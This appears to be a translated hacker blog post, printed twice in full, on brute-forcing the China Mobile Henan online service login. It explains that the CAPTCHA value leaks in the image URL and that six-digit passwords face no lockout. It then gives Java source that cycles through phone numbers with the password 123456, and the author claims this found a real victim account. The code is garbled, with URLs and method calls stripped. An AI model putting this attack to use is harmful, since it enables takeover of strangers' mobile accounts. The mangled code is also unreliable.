Declare it first. This article has no technical content---just to prove that Java can also be used as a cracking tool
Everyone should be very familiar with China Mobile's online customer service system, because I am a loyal Henan user of Mobile, so I will naturally start with Henan Mobile. Users who have handled services in the mobile hall are very clear that the user password can only be set to 6 digits 0~9. The online service system and the mobile core database are synchronized, and the password can only be limited to 6 digits. Such a simple password combination is very suitable for brute force cracking.
Let’s analyze the feasibility of brute-force cracking. First of all, the system should not limit the number of times logged in on that day. I will enter a mobile phone number to test the number of fault tolerances in the system. I tried it ten times and I can still enter the login interface (yes~there is a chance). Next, analyze the key fields that need to be submitted when logging in to the system. Let’s take a look at the login page/new_wskf/login/login_portal.jsp
__________________________________________
.....................
<form method="post" name="thisform"
//Post
...........
action="/servlet/."> -->
//The servlet that handles the login event seems to be the parameters it receives.
<input type="hidden" name="forwardFlag" value="0">
//Key fields forwardFlag I don't know what it is for, but the page refreshes multiple times without changing.
<input type="hidden" name="transaction" value="3">
// Key fields transaction Same as above
<input type="hidden" name="ssRandomPass" value="dNZjN/vfR4HwMACDVqhncQ==" >
//Key fields ssRandomPass Get a new random value every time you refresh, no display on the page
//It may be implicit information of identity identification
......................
//The following is the form content submitted by the user
<td><input type="text" name="userName" size="14"
//Haha mobile phone number
<td><input type="password" name="passWord"
//Mobile password
<td><input name="randomPassword" type="text"
//Picture verification code
.......................................
___________________________________
To sum up the post content: forwardFlag=0&transaction=3&ssRandomPassdNZjN/vfR4HwMACDVqhncQ==
&userName=135********&passWord=******&randomPassword=****
PassWord is what we want to guess, and how to lock randomPassword (verification code) is the key. Specifically, how to analyze the image verification code. Speaking of this, we have to mention that in the era of no verification code, many brute-force cracking software are very popular and are very effective for invading most mail servers and forums. It also made a number of classic cracking software famous, such as flowing light and snow tracing. (Haha, they are all cultural relics worth collecting)
Let’s take a look at how the verification code here generates the right-click verification code picture. Haha, what have we seen? /s ... let?randomPass=9814<-Is this exactly the value of our verification code?
We access the application to change the value of randomPass to 1111. Haha, as expected, a picture with the value of 1111 was generated. It can be seen from this that the generation of login verification programs and verification codes are two applications. Pass the parameter request from the returned login page. Generate verification code.
At this point, our analysis work is completed. There is no technical difficulty in how to use programs to achieve brute-force cracking. I wrote a Java version of application. The compilation test under win2000 was successful. I followed some QQ cracking modes. The password was 123456 and I kept changing the phone number. In less than 10 minutes, I found a user with a password of 123456.
*******This code is only for research and I am not responsible for the possible consequences of this program*******
The source code is as follows:
--------------
import .*;
import .*;
public class Result
{
public static String ssRandomPass,randomPassword;
public static int passWord=123456,num=00000;
//Set the six-digit mobile phone password and the last five-digit number of the mobile phone
public static void main(String args[]){
while(true)
{
check();
//This function captures the login page keyword fields
try {
URL url = new URL("/servlet/.");;
URLConnection connection = ();
(true);
OutputStreamWriter out = new OutputStreamWriter((), "8859_1");
("forwardFlag=0&transaction=3&ssRandomPass="+ssRandomPass+"&userName=
135286"+num+"&"+"passWord="+passWord+"&randomPassword="+randomPassword);//The information is submitted here
();
();
//Get back data
BufferedReader in = new BufferedReader(new InputStreamReader(()));
String line = null;
StringBuffer content= new StringBuffer();
while((line = ()) != null)
{
//line is the return value, which can determine whether it is successful or not.
(line);
}
() ;
in=null;
url=null;
String msg = ();
("Back code:"+()+" check passwd:"+passWord);
("check num:135256"+num);
if(()==412|num==99999)
{
("Get one phonenumber");
(msg);
break;
}
// passWord++;
num++;
} catch (MalformedURLException e) {
// TODO Auto-generated catch block
();
} catch (UnsupportedEncodingException e) {
// TODO Auto-generated catch block
();
} catch (IOException e) {
// TODO Auto-generated catch block
();
}
}
}
public static void check()
{
StringBuffer ssR = new StringBuffer();
StringBuffer rand = new StringBuffer();
try {
URL url = new URL("/new_wskf/login/login_portal.jsp");
URLConnection connection = ();
(true);
OutputStreamWriter out = new OutputStreamWriter((), "8859_1");
("?");
();
();
//Get back data
BufferedReader in = new BufferedReader(new InputStreamReader(()));
String line = null;
StringBuffer content= new StringBuffer();
while((line = ()) != null)
{
//line is the return value, which can determine whether it is successful or not.
(line);
}
() ;
in=null;
url=null;
String msg = ();
for (int i=0;i<=23;i++)
((1534+i));
ssRandomPass=();
(());
for (int i=0;i<=3;i++)
((2492+i));
randomPassword=();
(());
//(msg);
} catch (MalformedURLException e) {
// TODO Auto-generated catch block
();
} catch (UnsupportedEncodingException e) {
// TODO Auto-generated catch block
();
} catch (IOException e) {
// TODO Auto-generated catch block
();
}
}
}
Everyone should be very familiar with China Mobile's online customer service system, because I am a loyal Henan user of Mobile, so I will naturally start with Henan Mobile. Users who have handled services in the mobile hall are very clear that the user password can only be set to 6 digits 0~9. The online service system and the mobile core database are synchronized, and the password can only be limited to 6 digits. Such a simple password combination is very suitable for brute force cracking.
Let’s analyze the feasibility of brute-force cracking. First of all, the system should not limit the number of times logged in on that day. I will enter a mobile phone number to test the number of fault tolerances in the system. I tried it ten times and I can still enter the login interface (yes~there is a chance). Next, analyze the key fields that need to be submitted when logging in to the system. Let’s take a look at the login page/new_wskf/login/login_portal.jsp
__________________________________________
.....................
<form method="post" name="thisform"
//Post
...........
action="/servlet/."> -->
//The servlet that handles the login event seems to be the parameters it receives.
<input type="hidden" name="forwardFlag" value="0">
//Key fields forwardFlag I don't know what it is for, but the page refreshes multiple times without changing.
<input type="hidden" name="transaction" value="3">
// Key fields transaction Same as above
<input type="hidden" name="ssRandomPass" value="dNZjN/vfR4HwMACDVqhncQ==" >
//Key fields ssRandomPass Get a new random value every time you refresh, no display on the page
//It may be implicit information of identity identification
......................
//The following is the form content submitted by the user
<td><input type="text" name="userName" size="14"
//Haha mobile phone number
<td><input type="password" name="passWord"
//Mobile password
<td><input name="randomPassword" type="text"
//Picture verification code
.......................................
___________________________________
To sum up the post content: forwardFlag=0&transaction=3&ssRandomPassdNZjN/vfR4HwMACDVqhncQ==
&userName=135********&passWord=******&randomPassword=****
PassWord is what we want to guess, and how to lock randomPassword (verification code) is the key. Specifically, how to analyze the image verification code. Speaking of this, we have to mention that in the era of no verification code, many brute-force cracking software are very popular and are very effective for invading most mail servers and forums. It also made a number of classic cracking software famous, such as flowing light and snow tracing. (Haha, they are all cultural relics worth collecting)
Let’s take a look at how the verification code here generates the right-click verification code picture. Haha, what have we seen? /s ... let?randomPass=9814<-Is this exactly the value of our verification code?
We access the application to change the value of randomPass to 1111. Haha, as expected, a picture with the value of 1111 was generated. It can be seen from this that the generation of login verification programs and verification codes are two applications. Pass the parameter request from the returned login page. Generate verification code.
At this point, our analysis work is completed. There is no technical difficulty in how to use programs to achieve brute-force cracking. I wrote a Java version of application. The compilation test under win2000 was successful. I followed some QQ cracking modes. The password was 123456 and I kept changing the phone number. In less than 10 minutes, I found a user with a password of 123456.
*******This code is only for research and I am not responsible for the possible consequences of this program*******
The source code is as follows:
--------------
import .*;
import .*;
public class Result
{
public static String ssRandomPass,randomPassword;
public static int passWord=123456,num=00000;
//Set the six-digit mobile phone password and the last five-digit number of the mobile phone
public static void main(String args[]){
while(true)
{
check();
//This function captures the login page keyword fields
try {
URL url = new URL("/servlet/.");;
URLConnection connection = ();
(true);
OutputStreamWriter out = new OutputStreamWriter((), "8859_1");
("forwardFlag=0&transaction=3&ssRandomPass="+ssRandomPass+"&userName=
135286"+num+"&"+"passWord="+passWord+"&randomPassword="+randomPassword);//The information is submitted here
();
();
//Get back data
BufferedReader in = new BufferedReader(new InputStreamReader(()));
String line = null;
StringBuffer content= new StringBuffer();
while((line = ()) != null)
{
//line is the return value, which can determine whether it is successful or not.
(line);
}
() ;
in=null;
url=null;
String msg = ();
("Back code:"+()+" check passwd:"+passWord);
("check num:135256"+num);
if(()==412|num==99999)
{
("Get one phonenumber");
(msg);
break;
}
// passWord++;
num++;
} catch (MalformedURLException e) {
// TODO Auto-generated catch block
();
} catch (UnsupportedEncodingException e) {
// TODO Auto-generated catch block
();
} catch (IOException e) {
// TODO Auto-generated catch block
();
}
}
}
public static void check()
{
StringBuffer ssR = new StringBuffer();
StringBuffer rand = new StringBuffer();
try {
URL url = new URL("/new_wskf/login/login_portal.jsp");
URLConnection connection = ();
(true);
OutputStreamWriter out = new OutputStreamWriter((), "8859_1");
("?");
();
();
//Get back data
BufferedReader in = new BufferedReader(new InputStreamReader(()));
String line = null;
StringBuffer content= new StringBuffer();
while((line = ()) != null)
{
//line is the return value, which can determine whether it is successful or not.
(line);
}
() ;
in=null;
url=null;
String msg = ();
for (int i=0;i<=23;i++)
((1534+i));
ssRandomPass=();
(());
for (int i=0;i<=3;i++)
((2492+i));
randomPassword=();
(());
//(msg);
} catch (MalformedURLException e) {
// TODO Auto-generated catch block
();
} catch (UnsupportedEncodingException e) {
// TODO Auto-generated catch block
();
} catch (IOException e) {
// TODO Auto-generated catch block
();
}
}
}